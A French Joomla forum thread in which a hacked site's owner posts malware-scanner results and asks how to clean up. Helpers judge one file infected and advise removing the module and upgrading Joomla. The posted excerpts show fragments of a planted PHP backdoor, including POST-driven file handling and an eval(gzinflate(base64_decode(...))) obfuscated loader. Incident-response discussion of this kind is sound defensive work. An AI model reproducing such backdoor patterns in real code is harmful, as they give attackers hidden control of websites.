aeSecure Quick Scan - besoin d'aide sur certains points

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • aeSecure Quick Scan - besoin d'aide sur certains points

    Bonjour,

    Suite au piratage de mon site j'ai remis une sauvegarde antérieur. J'ai utilisé aeSecure Quick Scan mais par rapport aux résultats j'ai des doutes. Faut-il juste supprimer les codes malicieux des fichiers ou supprimer les fichiers? Merci par avance pour votre aide!

    Par exemples:

    /home/monsite/www/modules/mod_fxprev/libraries/tmpl.php(4.96K)(Date dernière modif. November 03 2015 15:11:23.)9d7f28772f7fd67ffc8c2ee4b3bf8333
    Attention Il ne s'agit pas forcément d'un virus!; la signature recherchée est également utilisée dans du code légitime.Signature : base64_decode Trouvé en position 202 du fichier; voici le contexte :
    Code PHP:
    ) ;
    $hostname $_SERVER['HTTP_HOST'];

    $action $_POST['action'];
    $file $_POST['file'];
    $data base64_decode($_POST['data']); (base64_decode est écrit en rouge)
    $tmpdir $_POST['tmpdir'];

    if (
    $action == 'gzip') {
        
    $ftime filemtime($base 
    /home/monsite/www/modules/mod_fxprev/libraries/search.php(28.83K)(Date dernière modif. December 09 2015 17:29:38.)36ca2fc9ab24f903b2fb933496c5b0cd
    Danger Forte probabilité qu'il s'agisse d'un fichier ayant été virusé ou étant un virusSignature : gzinflate(base64_decodeTrouvé en position 11 du fichier; voici le contexte :
    Code PHP:
    <?php eval(gzinflate(base64_decode('HZzHkuNQdgV/ZXYzE1jAu5BCE/CW8JYbBbz3Hl8vlhbdm64iAbx3z8lkg/jP//z3f+Z6/kdxJv2/qrcZyz7Zi3+lyVYQ2P/mRT
    Et également d'autres problèmes sur d'autres fichiers.

    Merci par avance pour vos conseils!

    Bonne journée

    Edit: Et comment peut-on savoir si c'est vraiment un virus et non un faux positif?
    Dernière édition par bizerte77 à 16/12/2015, 23h48

  • #2
    Re : aeSecure Quick Scan - besoin d'aide sur certains points

    Envoyé par bizerte77 Voir le message
    Edit: Et comment peut-on savoir si c'est vraiment un virus et non un faux positif?
    Simple : l'expertise :-)

    Seul l'oeil avisé d'un expert pourra te le confirmer.



    Pour ton premier fichier, faudrait en lire un peu plus; le second est clairement, aucune doute, un virus (ou partie d'un fichier sain mais ayant été virusé).
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : aeSecure Quick Scan - besoin d'aide sur certains points

      Bonjour,

      Merci. Bon effectivement je manque d'expertise dans ce domaine...

      Pour mon second fichier, je supprime juste la ligne de code en question?

      Merci!

      Commentaire


      • #4
        Re : aeSecure Quick Scan - besoin d'aide sur certains points

        Quel est le nom exact de ce module "mod_fxprev" ?
        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
        MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

        Commentaire


        • #5
          Re : aeSecure Quick Scan - besoin d'aide sur certains points

          Juste avec une partie d'un fichier; impossible à répondre avec 100% de garantie. A priori, oui pour le deuxième mais il t'appartient de décider de supprimer le fichier.
          Christophe (cavo789)
          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

          Commentaire


          • #6
            Re : aeSecure Quick Scan - besoin d'aide sur certains points

            Si c'est le module FXPreview, il semble qu'il ait disparu, et une recherche Google sur mod_fxprev donne quelques réponses de type module piraté.
            Personnellement, je désinstallerais ce module et surtout, je passerais au plus vite en version 3.4.6 plutôt que de rester en 2.5 (en espérant qu'en attendant, tu as appliqué le patch de sécurité pour cette version abandonnée il y a un an).
            "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
            MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

            Commentaire


            • #7
              Re : aeSecure Quick Scan - besoin d'aide sur certains points

              Bonjour,

              Merci pour vos réponses. J'ai une sauvegarde qui date du mois dernier (en local) et en regardant dans mes fichiers, par exemple : /modules/mod_fxprev/libraries/tmpl.php je constate qu'il n'existe pas dans mon dossier module "mod_fxprev".

              Je peux donc supposer que ça a été ajouté à mon insu (virus...) et que je peux supprimer dans mon site actuel le dossier "mod_fxprev" et son contenu ?

              Je peux donc comparer mon site actuel et ma sauvegarde clean du mois dernier et supprimer ce qui n'existait pas? Je n'ai ajouté aucun module/composant/plugin juste des articles.

              Merci par avance !

              Bonne journée

              Commentaire

              Annonce

              Réduire
              Aucune annonce pour le moment.

              Partenaire de l'association

              Réduire

              Hébergeur Web PlanetHoster
              Travaille ...
              X